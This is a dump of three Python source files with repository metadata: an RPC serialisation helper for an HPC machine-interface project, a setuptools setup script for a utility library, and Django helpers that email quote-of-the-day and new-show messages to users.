eaca5e1d6b6c0b3a0c295ed41759f106328a2408 | 3,446 | py | Python | MachineInterface/mproxy/core/rpc.py | KTH-HPC/vestec-system | 8168b90385468ca5e1ed701b5a0090e4423186c7 | [
"BSD-3-Clause"
] | 1 | 2021-10-31T08:41:58.000Z | 2021-10-31T08:41:58.000Z | MachineInterface/mproxy/core/rpc.py | KTH-HPC/vestec-system | 8168b90385468ca5e1ed701b5a0090e4423186c7 | [
"BSD-3-Clause"
] | null | null | null | MachineInterface/mproxy/core/rpc.py | KTH-HPC/vestec-system | 8168b90385468ca5e1ed701b5a0090e4423186c7 | [
"BSD-3-Clause"
] | 1 | 2022-02-08T16:57:05.000Z | 2022-02-08T16:57:05.000Z | import inspect
import json
from .serialisation import JsonObjHelper, JsonTypeError
class RpcMethod:
"""Encapsulate argument/result (de)serialisation for a function
based on a type-annotated function signature and name.
"""
def __init__(self, name, signature, doc=None):
if (
signature.return_annotation is None
or signature.return_annotation is signature.empty
):
signature = signature.replace(return_annotation=type(None))
self.name = name
self.sig = signature
self.doc = doc
@classmethod
def from_function(cls, func):
"""Factory function from a function"""
return cls(func.__name__, inspect.signature(func), func.__doc__)
def call_with(self, obj, arg_dict):
"""Apply a dictionary of arguments, probably from
deserialise_args, to an object assuming that it has a method
with our name and signature (less type annotations).
"""
bound = self.sig.bind(**arg_dict)
method = getattr(obj, self.name)
return method(*bound.args, **bound.kwargs)
def serialise_args(self, *args, **kwargs):
"""Turn this method's args+kwargs into bytes (UTF-8)"""
bound = self.sig.bind(*args, **kwargs)
json_obj = {}
for name, param in self.sig.parameters.items():
try:
py_obj = bound.arguments[name]
except KeyError:
continue
if not isinstance(py_obj, param.annotation):
raise TypeError(
'Argument "{}" not of type "{}"'.format(name, param.annotation)
)
json_obj[name] = JsonObjHelper.py2j(py_obj)
return json.dumps(json_obj).encode()
def deserialise_args(self, buf):
"""Turn raw bytes from the wire to a dictionary of arguments
matching our function signature, that can be applied to the real
method.
"""
dct = json.loads(buf)
arg_dict = {}
for name, param in self.sig.parameters.items():
try:
json_obj = dct.pop(name)
except KeyError:
py_obj = param.default
if py_obj is param.empty:
raise ValueError("Missing required argument: %s" % name)
else:
py_obj = JsonObjHelper.j2py(param.annotation, json_obj)
arg_dict[name] = py_obj
if len(dct):
raise ValueError(
"Unknown argument(s): " + ", ".join('"%"' % k for k in dct.keys())
)
return arg_dict
def serialise_result(self, pyobj):
"""Turn an actual result object into bytes (UTF-8)"""
rt = self.sig.return_annotation
if not isinstance(pyobj, rt):
raise TypeError('Return value not of type "{}"'.format(rt))
jobj = JsonObjHelper.py2j(pyobj)
return json.dumps(jobj).encode()
def deserialise_result(self, buf):
"""Turn raw bytes from the wire to an object of return
annotation type.
"""
json_obj = json.loads(buf)
try:
return JsonObjHelper.j2py(self.sig.return_annotation, json_obj)
except JsonTypeError as e:
# TypeErrors from j2py should be ValueError really
raise ValueError("reconstructed types do not match") from e
pass
rpcmethod = RpcMethod.from_function
| 34.118812 | 83 | 0.591991 | 3,322 | 0.964016 | 0 | 0 | 166 | 0.048172 | 0 | 0 | 929 | 0.269588 |
eacbb51236c58c13c95ec1f889b714733a550d0d | 1,567 | py | Python | setup.py | ajaniv/python-basic-utils | d8217e58030f8cc7d6a59a14e438eb700a2492f1 | [
"MIT"
] | null | null | null | setup.py | ajaniv/python-basic-utils | d8217e58030f8cc7d6a59a14e438eb700a2492f1 | [
"MIT"
] | 4 | 2016-12-23T18:46:54.000Z | 2018-08-30T19:31:31.000Z | setup.py | ajaniv/python-core-utils | d8217e58030f8cc7d6a59a14e438eb700a2492f1 | [
"MIT"
] | null | null | null | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
"""
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='python-core-utils',
version='0.5.0',
description='Python core utility functions',
long_description=long_description,
url='https://github.com/ajaniv/python-core-utils',
author='Amnon Janiv',
author_email='amnon.janiv@ondalear.com',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
keywords='python core utility functions',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=['Pillow>=4.1.1',
'docutils>=0.14'],
extras_require={
'dev': ['check-manifest'],
'test': ['coverage'],
},
test_suite='tests'
)
| 29.566038 | 71 | 0.623484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 877 | 0.559668 |
eacbdadce424c8674d1462fffb1cb970c545200c | 2,506 | py | Python | emails/utils.py | jmhubbard/quote_of_the_day_custom_user | 27024b2953c1c94fd2970563c3ab31ad444912b6 | [
"Unlicense"
] | 1 | 2020-11-25T04:57:16.000Z | 2020-11-25T04:57:16.000Z | emails/utils.py | jmhubbard/quote_of_the_day_custom_user | 27024b2953c1c94fd2970563c3ab31ad444912b6 | [
"Unlicense"
] | null | null | null | emails/utils.py | jmhubbard/quote_of_the_day_custom_user | 27024b2953c1c94fd2970563c3ab31ad444912b6 | [
"Unlicense"
] | null | null | null | import os
from django.core.mail import send_mail
from django.urls import reverse
from django.contrib.sites.models import Site
from django.template.loader import render_to_string
def email_all_users_an_email(user, showlist):
#Gets the current domain name
domain = Site.objects.get_current().domain
# reverse a url in a view to get the path after the domain
path = reverse('login')
url = 'http://{domain}{path}'.format(domain=domain, path=path)
context = {
"unsubscribe_uri": url,
"showlist": showlist,
}
message_text = render_to_string("emails/email_all_users.txt", context=context)
message_html = render_to_string("emails/email_all_users.html", context=context)
return send_mail(
"New Shows Added",
message_text,
os.getenv("EMAIL_HOST_USER"),
[user],
fail_silently=False,
html_message=message_html,
)
def email_test(user, message):
send_mail(
'Quote test',
message,
os.getenv("EMAIL_HOST_USER"),
[user],
fail_silently=False,
)
def email_daily_tv_quote(quote, user):
#Gets the current domain name
domain = Site.objects.get_current().domain
# reverse a url in a view to get the path after the domain
path = reverse('login')
url = 'http://{domain}{path}'.format(domain=domain, path=path)
context = {
"unsubscribe_uri": url,
"quote": quote,
}
message_text = render_to_string("emails/tv_email.txt", context=context)
message_html = render_to_string("emails/tv_email.html", context=context)
return send_mail(
"Quote Of The Day",
message_text,
os.getenv("EMAIL_HOST_USER"),
[user],
fail_silently=False,
html_message=message_html,
)
def email_daily_movie_quote(quote, user):
#Gets the current domain name
domain = Site.objects.get_current().domain
# reverse a url in a view to get the path after the domain
path = reverse('login')
url = 'http://{domain}{path}'.format(domain=domain, path=path)
context = {
"unsubscribe_uri": url,
"quote": quote,
}
message_text = render_to_string("emails/movie_email.txt", context=context)
message_html = render_to_string("emails/movie_email.html", context=context)
return send_mail(
"Quote Of The Day",
message_text,
os.getenv("EMAIL_HOST_USER"),
[user],
fail_silently=False,
html_message=message_html,
) | 30.560976 | 83 | 0.65842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 708 | 0.282522 |